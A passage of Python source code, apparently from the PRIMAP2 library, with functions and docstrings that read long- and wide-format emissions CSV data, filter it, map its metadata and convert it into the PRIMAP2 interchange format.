data_long: pd.DataFrame,
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y-%m-%d",
) -> pd.DataFrame:
"""convert a DataFrame in long (tidy) format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
Parameters
----------
data_long: str, pd.DataFrame
Long format DataFrame file which will be converted.
coords_cols : dict
Dict where the keys are column names in the files to be read and the value is
the dimension in PRIMAP2. To specify the data column containing the observable,
use the "data" key. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the dataframe to be
converted and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. For the "category", "entity", and "unit" columns,
the rule "PRIMAP1" is available, which translates from PRIMAP1 metadata to
PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Values are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filling function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to format the time information for the data columns
in the interchange format.
Default: "%F", i.e. the ISO 8601 date format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
if add_coords_cols is None:
add_coords_cols = {}
if meta_data is None:
attrs = {}
else:
attrs = meta_data.copy()
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
filter_data(data_long, filter_keep, filter_remove)
add_dimensions_from_defaults(
data_long, coords_defaults, additional_allowed_coords=["time"]
)
naming_attrs = rename_columns(
data_long, coords_cols, add_coords_cols, coords_defaults, coords_terminologies
)
attrs.update(naming_attrs)
additional_coordinates = additional_coordinate_metadata(
add_coords_cols, coords_cols, coords_terminologies
)
if coords_value_mapping is not None:
map_metadata(data_long, attrs=attrs, meta_mapping=coords_value_mapping)
if coords_value_filling is not None:
data_long = fill_from_other_col(
data_long, attrs=attrs, coords_value_filling=coords_value_filling
)
coords = list(set(data_long.columns.values) - {"data"})
harmonize_units(data_long, dimensions=coords, attrs=attrs)
data_long["time"] = pd.to_datetime(data_long["time"], format=time_format)
data, coords = long_to_wide(data_long, time_format=time_format)
data, coords = sort_columns_and_rows(data, dimensions=coords)
dims = coords.copy()
for add_coord in add_coords_cols.keys():
dims.remove(add_coord)
data.attrs = interchange_format_attrs_dict(
xr_attrs=attrs,
time_format=time_format,
dimensions=dims,
additional_coordinates=additional_coordinates,
)
return data
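The `coords_value_mapping` semantics described in the docstring (a dict value maps old to new metadata values, a callable transforms each value) can be sketched in plain pandas. `map_metadata` itself is defined elsewhere in this module, so the loop below is an illustrative stand-in on hypothetical toy data, not the actual implementation:

```python
import pandas as pd

# Hypothetical toy metadata table, not primap2's actual API.
df = pd.DataFrame({"entity": ["CO2", "CH4"], "unit": ["Gg", "Gg"]})

# A dict value maps old -> new metadata values; a callable transforms
# each value (mirroring the coords_value_mapping semantics above).
mapping = {
    "entity": {"CH4": "CH4 (SARGWP100)"},
    "unit": lambda u: u + " CO2 / yr",
}

for col, rule in mapping.items():
    if callable(rule):
        df[col] = df[col].map(rule)
    else:
        df[col] = df[col].replace(rule)
```

String rules like `"PRIMAP1"` are resolved to conversion functions inside the package and are not reproduced here.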
def read_long_csv_file_if(
filepath_or_buffer: Union[str, Path, IO],
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y-%m-%d",
) -> pd.DataFrame:
"""Read a CSV file in long (tidy) format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
Parameters
----------
filepath_or_buffer: str, pathlib.Path, or file-like
Long CSV file which will be read.
coords_cols : dict
Dict where the keys are column names in the files to be read and the value is
the dimension in PRIMAP2. To specify the data column containing the observable,
use the "data" key. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the csv file to be
read and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. For the "category", "entity", and "unit" columns,
the rule "PRIMAP1" is available, which translates from PRIMAP1 metadata to
PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Values are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filling function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to format the time information for the data columns
in the interchange format.
Default: "%F", i.e. the ISO 8601 date format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
data_long = read_long_csv(filepath_or_buffer, coords_cols, add_coords_cols)
return convert_long_dataframe_if(
data_long=data_long,
coords_cols=coords_cols,
add_coords_cols=add_coords_cols,
coords_defaults=coords_defaults,
coords_terminologies=coords_terminologies,
coords_value_mapping=coords_value_mapping,
coords_value_filling=coords_value_filling,
filter_keep=filter_keep,
filter_remove=filter_remove,
meta_data=meta_data,
time_format=time_format,
)
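The `filter_keep` semantics in the docstring (conditions inside one filter combine with AND, separate filters combine with OR) can be sketched in plain pandas. `filter_data` itself is defined elsewhere in this module, so this loop is an illustrative stand-in on hypothetical toy data:

```python
import pandas as pd

# Hypothetical toy data, mirroring the filter_keep example in the docstring.
df = pd.DataFrame({
    "variable": ["CO2", "CH4", "N2O", "N2O", "CO2"],
    "region": ["USA", "USA", "DEU", "USA", "DEU"],
})

filter_keep = {
    "f_1": {"variable": ["CO2", "CH4"], "region": "USA"},
    "f_2": {"variable": "N2O"},
}

# Rows matching *any* filter are kept; within a filter, *all* column
# conditions must hold.
keep = pd.Series(False, index=df.index)
for flt in filter_keep.values():
    match = pd.Series(True, index=df.index)
    for col, values in flt.items():
        if isinstance(values, list):
            match &= df[col].isin(values)
        else:
            match &= df[col] == values
    keep |= match
df_kept = df[keep]
```

In this toy table only the (CO2, DEU) row matches neither filter and is dropped.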
def long_to_wide(
data_long: pd.DataFrame, *, time_format: str
) -> (pd.DataFrame, List[str]):
data_long["time"] = data_long["time"].dt.strftime(time_format)
coords = list(set(data_long.columns.values) - {"data", "time"})
# unit is neither a coordinate nor a data column, so has to be handled separately
unit = data_long[coords].drop_duplicates()
coords.remove("unit")
unit.index = pd.MultiIndex.from_frame(unit[coords])
series = data_long["data"]
series.index = pd.MultiIndex.from_frame(data_long[coords + ["time"]])
data = series.unstack("time")
data["unit"] = unit["unit"]
data.reset_index(inplace=True)
data.columns.name = None
return data, coords + ["unit"]
def convert_wide_dataframe_if(
data_wide: pd.DataFrame,
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y",
time_cols: Optional[List] = None,
) -> pd.DataFrame:
"""
Convert a DataFrame in wide format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
terminology information will be added by this function. You can not use the short
dimension names in the attributes (e.g. "cat" instead of "category").
TODO: Currently duplicate data points will not be detected.
TODO: enable filtering through query strings
TODO: enable specification of the entity terminology
Parameters
----------
data_wide: pd.DataFrame
Wide DataFrame which will be converted.
coords_cols : dict
Dict where the keys are PRIMAP2 dimension names and the values are column
names in the dataframe to be converted.
For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the dataframe to be
converted and the second is the primap2 dimension for the coordinate (e.g.
``category`` for a ``category_name`` coordinate.
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the dataframe.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. The only defined rule at the moment is "PRIMAP1"
which can be used for the "category", "entity", and "unit" columns to translate
from PRIMAP1 metadata to PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Values are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
filling function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str
str with strftime style format used to parse the time information for
the data columns.
Default: "%Y", which will match years.
time_cols : list, optional
List of column names which contain the data for each time point. If not given
cols will be inferred using time_format.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
*Example for meta_mapping*::
meta_mapping = {
'pyCPA_col_1': {'col_1_value_1_in': 'col_1_value_1_out',
'col_1_value_2_in': 'col_1_value_2_out',
},
'pyCPA_col_2': {'col_2_value_1_in': 'col_2_value_1_out',
'col_2_value_2_in': 'col_2_value_2_out',
},
}
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
countries
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
This filter removes all data with 'HISTORY' as scenario
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
if add_coords_cols is None:
add_coords_cols = {}
if meta_data is None:
attrs = {}
else:
attrs = meta_data.copy()
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
# get all the columns that are actual data not metadata (usually the years)
if time_cols is None:
time_columns = [
col
for col in data_wide.columns.values
if matches_time_format(col, time_format)
]
else:
time_columns = time_cols
# make a copy of the data to not alter the input data
data_if = data_wide.copy()
filter_data(data_if, filter_keep, filter_remove)
add_dimensions_from_defaults(data_if, coords_defaults)
naming_attrs = rename_columns(
data_if, coords_cols, add_coords_cols, coords_defaults, coords_terminologies
)
attrs.update(naming_attrs)
additional_coordinates = additional_coordinate_metadata(
add_coords_cols, coords_cols, coords_terminologies
)
if coords_value_mapping is not None:
map_metadata(data_if, attrs=attrs, meta_mapping=coords_value_mapping)
if coords_value_filling is not None:
data_if = fill_from_other_col(
data_if, attrs=attrs, coords_value_filling=coords_value_filling
)
coords = list(set(data_if.columns.values) - set(time_columns))
harmonize_units(data_if, dimensions=coords, attrs=attrs)
data_if, coords = sort_columns_and_rows(data_if, dimensions=coords)
dims = coords.copy()
for add_coord in add_coords_cols.keys():
dims.remove(add_coord)
data_if.attrs = interchange_format_attrs_dict(
xr_attrs=attrs,
time_format=time_format,
dimensions=dims,
additional_coordinates=additional_coordinates,
)
return data_if
def read_wide_csv_file_if(
filepath_or_buffer: Union[str, Path, IO],
*,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]] = None,
coords_defaults: Optional[Dict[str, Any]] = None,
coords_terminologies: Dict[str, str],
coords_value_mapping: Optional[Dict[str, Any]] = None,
coords_value_filling: Optional[Dict[str, Dict[str, Dict]]] = None,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
meta_data: Optional[Dict[str, Any]] = None,
time_format: str = "%Y",
) -> pd.DataFrame:
"""Read a CSV file in wide format into the PRIMAP2 interchange format.
Columns can be renamed or filled with default values to match the PRIMAP2 structure.
Where we refer to "dimensions" in the parameter description below we mean the basic
dimension names without the added terminology (e.g. "area" not "area (ISO3)"). The
    terminology information will be added by this function. You cannot use the short
    dimension names in the attributes (e.g. "cat" instead of "category").
TODO: Currently duplicate data points will not be detected.
TODO: enable filtering through query strings
TODO: enable specification of the entity terminology
Parameters
----------
filepath_or_buffer: str, pathlib.Path, or file-like
Wide CSV file which will be read.
coords_cols : dict
Dict where the keys are PRIMAP2 dimensions and the values are column names in
the files to be read. For secondary categories use a ``sec_cats__`` prefix.
add_coords_cols : dict, optional
Dict where the keys are PRIMAP2 additional coordinate names and the values are
lists with two elements where the first is the column in the csv file to be
read and the second is the primap2 dimension for the coordinate (e.g.
        ``category`` for a ``category_name`` coordinate).
coords_defaults : dict, optional
Dict for default values of coordinates / dimensions not given in the csv files.
The keys are the dimension names and the values are the values for
the dimensions. For secondary categories use a ``sec_cats__`` prefix.
coords_terminologies : dict
Dict defining the terminologies used for the different coordinates (e.g. ISO3
for area). Only possible coordinates here are: area, category, scenario,
entity, and secondary categories. For secondary categories use a ``sec_cats__``
prefix. All entries different from "area", "category", "scenario", "entity", and
``sec_cats__<name>`` will raise a ValueError.
coords_value_mapping : dict, optional
A dict with primap2 dimension names as keys. Values are dicts with input values
as keys and output values as values. A standard use case is to map gas names
from input data to the standardized names used in primap2.
Alternatively a value can also be a function which transforms one CSV metadata
value into the new metadata value.
A third possibility is to give a string as a value, which defines a rule for
translating metadata values. The only defined rule at the moment is "PRIMAP1"
which can be used for the "category", "entity", and "unit" columns to translate
from PRIMAP1 metadata to PRIMAP2 metadata.
coords_value_filling : dict, optional
A dict with primap2 dimension names as keys. These are the target columns where
        values will be filled (or replaced). Values are dicts with primap2 dimension names
as keys. These are the source columns. The values are dicts with source value -
target value mappings.
The value filling can do everything that the value mapping can, but while mapping
can only replace values within a column using information from that column, the
        filling function can also fill or replace data based on values from a different
column.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
filter_keep : dict, optional
Dict defining filters of data to keep. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance. Default: keep all data.
filter_remove : dict, optional
Dict defining filters of data to remove. Filtering is done before metadata
mapping, so use original metadata values to define the filter. Column names are
as in the csv file. Each entry in the dict defines an individual filter.
The names of the filters have no relevance.
meta_data : dict, optional
Meta data for the whole dataset. Will end up in the dataset-wide attrs. Allowed
keys are "references", "rights", "contact", "title", "comment", "institution",
and "history". Documentation about the format and meaning of the meta data can
be found in the
`data format documentation <https://primap2.readthedocs.io/en/stable/data_format_details.html#dataset-attributes>`_. # noqa: E501
time_format : str, optional
strftime style format used to parse the time information for the data columns.
Default: "%Y", which will match years.
Returns
-------
obj: pd.DataFrame
pandas DataFrame with the read data
Examples
--------
    *Example for coords_value_mapping*::

        coords_value_mapping = {
            'col_1': {'col_1_value_1_in': 'col_1_value_1_out',
                      'col_1_value_2_in': 'col_1_value_2_out',
                      },
            'col_2': {'col_2_value_1_in': 'col_2_value_1_out',
                      'col_2_value_2_in': 'col_2_value_2_out',
                      },
        }
*Example for filter_keep*::
filter_keep = {
'f_1': {'variable': ['CO2', 'CH4'], 'region': 'USA'},
'f_2': {'variable': 'N2O'}
}
    This example filter keeps all CO2 and CH4 data for the USA and N2O data for all
    countries.
*Example for filter_remove*::
filter_remove = {
'f_1': {'scenario': 'HISTORY'},
}
    This filter removes all data with 'HISTORY' as scenario.
"""
# Check and prepare arguments
if coords_defaults is None:
coords_defaults = {}
check_mandatory_dimensions(coords_cols, coords_defaults)
check_overlapping_specifications(coords_cols, coords_defaults)
if add_coords_cols:
check_overlapping_specifications_add_cols(coords_cols, add_coords_cols)
data, time_columns = read_wide_csv(
filepath_or_buffer,
coords_cols,
add_coords_cols=add_coords_cols,
time_format=time_format,
)
data = convert_wide_dataframe_if(
data,
coords_cols=coords_cols,
add_coords_cols=add_coords_cols,
coords_defaults=coords_defaults,
coords_terminologies=coords_terminologies,
coords_value_mapping=coords_value_mapping,
coords_value_filling=coords_value_filling,
filter_keep=filter_keep,
filter_remove=filter_remove,
meta_data=meta_data,
time_format=time_format,
time_cols=time_columns,
)
return data
def interchange_format_attrs_dict(
    *, xr_attrs: dict, time_format: str, dimensions: List[str], additional_coordinates: Optional[dict] = None
) -> dict:
metadata = {
"attrs": xr_attrs,
"time_format": time_format,
"dimensions": {"*": dimensions.copy()},
}
if additional_coordinates:
metadata["additional_coordinates"] = additional_coordinates
return metadata
def additional_coordinate_metadata(
add_coords_cols: Dict[str, List[str]],
coords_cols: Dict[str, str],
coords_terminologies: Dict[str, str],
) -> dict:
"""Create the `additional_coordinates` dict and do a few consistency checks"""
additional_coordinates = {}
for coord in add_coords_cols:
if coord in coords_terminologies:
logger.error(
f"Additional coordinate {coord} has terminology definition. "
f"This is currently not supported by PRIMAP2."
)
raise ValueError(
f"Additional coordinate {coord} has terminology definition. "
f"This is currently not supported by PRIMAP2."
)
if add_coords_cols[coord][1] not in coords_cols:
logger.error(
f"Additional coordinate {coord} refers to unknown coordinate "
f"{add_coords_cols[coord][1]}. "
)
raise ValueError(
f"Additional coordinate {coord} refers to unknown coordinate "
f"{add_coords_cols[coord][1]}. "
)
if add_coords_cols[coord][1] in coords_terminologies:
additional_coordinates[coord] = (
f"{add_coords_cols[coord][1]} "
f"({coords_terminologies[add_coords_cols[coord][1]]})"
)
else:
additional_coordinates[coord] = add_coords_cols[coord][1]
return additional_coordinates
def check_mandatory_dimensions(
coords_cols: Dict[str, str],
coords_defaults: Dict[str, Any],
):
"""Check if all mandatory dimensions are specified."""
for coord in INTERCHANGE_FORMAT_MANDATORY_COLUMNS:
if coord not in coords_cols and coord not in coords_defaults:
logger.error(
f"Mandatory dimension {coord!r} not found in coords_cols={coords_cols}"
f" or coords_defaults={coords_defaults}."
)
raise ValueError(f"Mandatory dimension {coord!r} not defined.")
def check_overlapping_specifications(
coords_cols: Dict[str, str],
coords_defaults: Dict[str, Any],
):
both = set(coords_cols.keys()).intersection(set(coords_defaults.keys()))
if both:
logger.error(
f"{both!r} is given in coords_cols and coords_defaults, but"
f" it must only be given in one of them."
)
raise ValueError(f"{both!r} given in coords_cols and coords_defaults.")
def check_overlapping_specifications_add_cols(
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, Any],
):
cols_add = [val[0] for val in add_coords_cols.values()]
both = set(coords_cols.values()).intersection(set(cols_add))
if both:
logger.error(
f"columns {both!r} used for dimensions and additional coordinates, but"
f" should be used in only one of them."
)
raise ValueError(f"{both!r} given in coords_cols and add_coords_cols.")
def matches_time_format(value: str, time_format: str) -> bool:
try:
datetime.datetime.strptime(value, time_format)
return True
except ValueError:
return False
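# An illustrative, self-contained sketch of how the check above separates data
# columns (usually years) from metadata columns; the column names are invented.

```python
import datetime


def looks_like_time(value: str, time_format: str = "%Y") -> bool:
    # Same idea as matches_time_format: a column header counts as a data
    # column if it parses under the strftime-style format.
    try:
        datetime.datetime.strptime(value, time_format)
        return True
    except ValueError:
        return False


columns = ["area", "unit", "1990", "1991", "category"]
time_columns = [col for col in columns if looks_like_time(col)]
# time_columns is ["1990", "1991"]
```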
def read_wide_csv(
filepath_or_buffer,
coords_cols: Dict[str, str],
    add_coords_cols: Optional[Dict[str, List[str]]] = None,
time_format: str = "%Y",
) -> (pd.DataFrame, List[str]):
data = pd.read_csv(filepath_or_buffer, na_values=NA_VALUES)
# get all the columns that are actual data not metadata (usually the years)
time_cols = [
col for col in data.columns.values if matches_time_format(col, time_format)
]
# remove all non-numeric values from year columns
# (what is left after mapping to nan when reading data)
for col in time_cols:
data[col] = data[col][
pd.to_numeric(data[col], errors="coerce").notnull()
].astype(float)
# remove all cols not in the specification
columns = data.columns.values
if add_coords_cols:
add_coords_col_names = {value[0] for value in add_coords_cols.values()}
else:
add_coords_col_names = set()
data.drop(
columns=list(
set(columns)
- set(coords_cols.values())
- add_coords_col_names
- set(time_cols)
),
inplace=True,
)
# check that all cols in the specification could be read
missing = set(coords_cols.values()) - set(data.columns.values)
if missing:
logger.error(
f"Column(s) {missing} specified in coords_cols, but not found in "
f"the CSV file {filepath_or_buffer!r}."
)
raise ValueError(f"Columns {missing} not found in CSV.")
return data, time_cols
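# The non-numeric cleanup above can be demonstrated on a toy frame (the column
# names and notation keys below are invented); values that fail numeric
# coercion end up as NaN after the index-aligned assignment.

```python
import pandas as pd

data = pd.DataFrame({"2000": ["1.5", "IE", "2.0"], "2001": ["3.0", "4.0", "C"]})
for col in ["2000", "2001"]:
    # keep only rows that coerce to numbers; everything else becomes NaN
    data[col] = data[col][
        pd.to_numeric(data[col], errors="coerce").notnull()
    ].astype(float)
# data["2000"] is [1.5, NaN, 2.0]
```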
def read_long_csv(
filepath_or_buffer,
coords_cols: Dict[str, str],
    add_coords_cols: Optional[Dict[str, List[str]]] = None,
) -> pd.DataFrame:
try:
csv_data_column = coords_cols["data"]
except KeyError:
raise ValueError(
"No data column in the CSV specified in coords_cols, so nothing to read."
)
if "time" in coords_cols:
parse_dates = [coords_cols["time"]]
else:
parse_dates = False
if add_coords_cols:
add_coords_col_names = {value[0] for value in add_coords_cols.values()}
else:
add_coords_col_names = set()
usecols = list(coords_cols.values()) + list(add_coords_col_names)
data = pd.read_csv(
filepath_or_buffer,
na_values=NA_VALUES,
parse_dates=parse_dates,
usecols=usecols,
)
# remove all non-numeric values from data column
data[csv_data_column] = data[csv_data_column][
pd.to_numeric(data[csv_data_column], errors="coerce").notnull()
].astype(float)
return data
def spec_to_query_string(filter_spec: Dict[str, Union[list, Any]]) -> str:
"""Convert filter specification to query string.
All column conditions in the filter are combined with &."""
queries = []
for col in filter_spec:
if isinstance(filter_spec[col], list):
itemlist = ", ".join(repr(x) for x in filter_spec[col])
filter_query = f"{col} in [{itemlist}]"
else:
filter_query = f"{col} == {filter_spec[col]!r}"
queries.append(filter_query)
return " & ".join(queries)
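# For illustration, the query strings built here plug straight into
# pandas.DataFrame.query; the data frame and filter values below are invented.

```python
import pandas as pd

data = pd.DataFrame(
    {"variable": ["CO2", "CH4", "N2O"], "region": ["USA", "USA", "DEU"]}
)
# A filter spec like {'variable': ['CO2', 'CH4'], 'region': 'USA'} becomes:
query = "variable in ['CO2', 'CH4'] & region == 'USA'"
kept = data.query(query)
# kept contains the two USA rows (CO2 and CH4)
```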
def filter_data(
data: pd.DataFrame,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
):
# Filters for keeping data are combined with "or" so that
# everything matching at least one rule is kept.
if filter_keep:
queries = []
for filter_spec in filter_keep.values():
q = spec_to_query_string(filter_spec)
queries.append(f"({q})")
query = " | ".join(queries)
data.query(query, inplace=True)
# Filters for removing data are negated and combined with "and" so that
# only rows which don't match any rule are kept.
